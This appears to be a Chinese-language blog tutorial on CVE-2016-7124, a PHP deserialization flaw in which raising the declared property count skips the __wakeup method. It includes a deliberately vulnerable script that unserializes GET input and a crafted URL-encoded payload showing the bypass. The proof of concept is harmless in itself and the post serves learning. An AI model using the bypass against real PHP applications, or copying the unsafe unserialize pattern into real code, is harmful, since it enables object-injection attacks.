本文最后更新于:2021年8月28日晚上6点40分
CVE-2016-7124
漏洞原理
当反序列化字符串中,表示属性个数的值大于真实属性个数时,会绕过 __wakeup 函数的执行。
漏洞影响范围
PHP5 < 5.6.25
PHP7 < 7.0.10
PHP5.5.9的wakeup绕过
假设有以下代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| <?php
class User{
public $username;
public $password;
function __wakeup(){
die("123");
}
function __destruct(){
die("456");
}
}
$a = $_GET['a'];
$a_unseri = unserialize($a);
var_dump($a_unseri);
?>
|
构造对象:
1
2
3
4
5
6
7
8
9
10
| <?php
class User{
public $username = "Lxxx";
public $password = "lxxx";
}
$a = new User();
echo urlencode(serialize($a));
echo "\n";
echo serialize($a);
?>
|
得到结果:
1
2
| O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
|
对浏览器传参:
1
| O%3A4%3A%22User%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
|
得到结果为:
但是当我们将对象数修改的大一些(由2修改为3):
1
2
| O:4:"User":2:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
O:4:"User":3:{s:8:"username";s:4:"Lxxx";s:8:"password";s:4:"lxxx";}
|
即传参:
1
| O%3A4%3A%22User%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A4%3A%22Lxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A4%3A%22lxxx%22%3B%7D
|
得到的结果为:
也就绕过了wakeup这个魔术方法